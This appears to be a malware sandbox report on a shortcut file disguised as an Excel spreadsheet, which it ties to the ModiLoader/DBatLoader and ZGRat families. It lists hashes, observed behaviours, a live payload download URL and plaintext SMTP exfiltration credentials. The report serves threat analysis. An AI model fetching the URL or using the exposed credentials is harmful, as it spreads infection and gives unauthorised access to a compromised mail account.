General
-
Target
db982b4701f5517c3401f594d6a14d7499dac01f85f264859723a02c3b67e542
-
Size
64KB
-
Sample
240424-b1pckadg61
-
MD5
8e6a493d50f3bf718847ac93b65a909a
-
SHA1
8e2dbe3ea1f553c366da30769f335792a1b9f49c
-
SHA256
db982b4701f5517c3401f594d6a14d7499dac01f85f264859723a02c3b67e542
-
SHA512
1439e1f5cd5c2b66ed2d97a4dbea9852d15f66a1bd4603e46cba649100989c1961caf9f6e8464c690a435826d38734ba8aac4e94d6ab7c770799f1a71c944a27
-
SSDEEP
24:5xWJH/G8j/tPIh0A/BHYVKVWXlMT+/CWlrDA4mzScdCZTCJCZkrab0JG:5xWJH/fj9VE5aeCfA4mldCZTCJCZ6aQ
Static task
static1
Behavioral task
behavioral1
Sample
FT. 40FE CNY .xlsx.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FT. 40FE CNY .xlsx.lnk
Resource
win10v2004-20240412-en
Malware Config
Extracted
https://www.sessosesso.it/assets/aw/yt.hta
Extracted
https://www.sessosesso.it/assets/aw/yt.hta
Extracted
Protocol: smtp- Host:
mail.irmaklarpaslanmaz.com.tr - Port:
587 - Username:
muhasebe@irmaklarpaslanmaz.com.tr - Password:
MH5473588PmZ
Targets
-
-
Target
FT. 40FE CNY .xlsx.lnk
-
Size
2KB
-
MD5
82fde340f187a517e0feced1d4972363
-
SHA1
07740ba4e30a1dbc830451a0d05130ba1af28be9
-
SHA256
e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3
-
SHA512
db1630813f3a6e19b9c1bfb6dbaecd3829592230635721df5e2121217bbe2ea2a7594eae7061d5d2ce2baf4bfad5687ce22fa58dba94e8e30b0d7630e872f79c
-
Detect ZGRat V1
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage
-
Blocklisted process makes network request
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Loads dropped DLL
-
Adds Run key to start application
-
Suspicious use of SetThreadContext
-